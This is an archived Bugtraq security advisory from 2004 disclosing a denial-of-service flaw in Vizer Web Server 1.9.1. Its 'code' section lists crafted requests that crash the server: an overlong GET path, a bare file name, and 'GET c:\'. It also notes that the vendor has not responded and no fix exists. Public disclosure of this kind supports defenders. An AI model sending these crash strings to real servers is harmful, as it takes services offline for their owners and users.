Bugtraq mailing list archives

Denial Of Service in Vizer Web Server 1.9.1

From: "Donato Ferrante" <fdonato () autistici org>
Date: Tue, 17 Feb 2004 09:49:48 -0000

                          Donato Ferrante


Application:  Vizer Web Server
              http://sourceforge.net/projects/vizerwebserver/

Version:      1.9.1

Bug:          Denial Of Service

Author:       Donato Ferrante
              e-mail: fdonato () autistici org
              web:    www.autistici.org/fdonato


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

1. Description
2. The bug
3. The code
4. The fix



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------
1. Description:
----------------

Vendor's Description:

"Vizer is an open source web server written in Visual Basic."



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
2. The bug:
-------------

The program doesn't well menage the input strings received, so an
attacker is able to crash the web server, sending a crafted string.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
3. The code:
-------------

To test the vulnerability, send to the web server a string like:

index.htm
( without specifying GET and HTTP )

or:

GET /aaaaaa[ 250 of a ]aaa HTTP/1.1
( specifying GET and HTTP )

GET /aaaaaa[ 250 of a ]aaa
( specifying only GET )

or:

GET c:\
( specifying only GET )



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
4. The fix:
------------

No fix.
The vendor has not answered to my signalations.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Current thread:

Denial Of Service in Vizer Web Server 1.9.1 Donato Ferrante (Feb 17)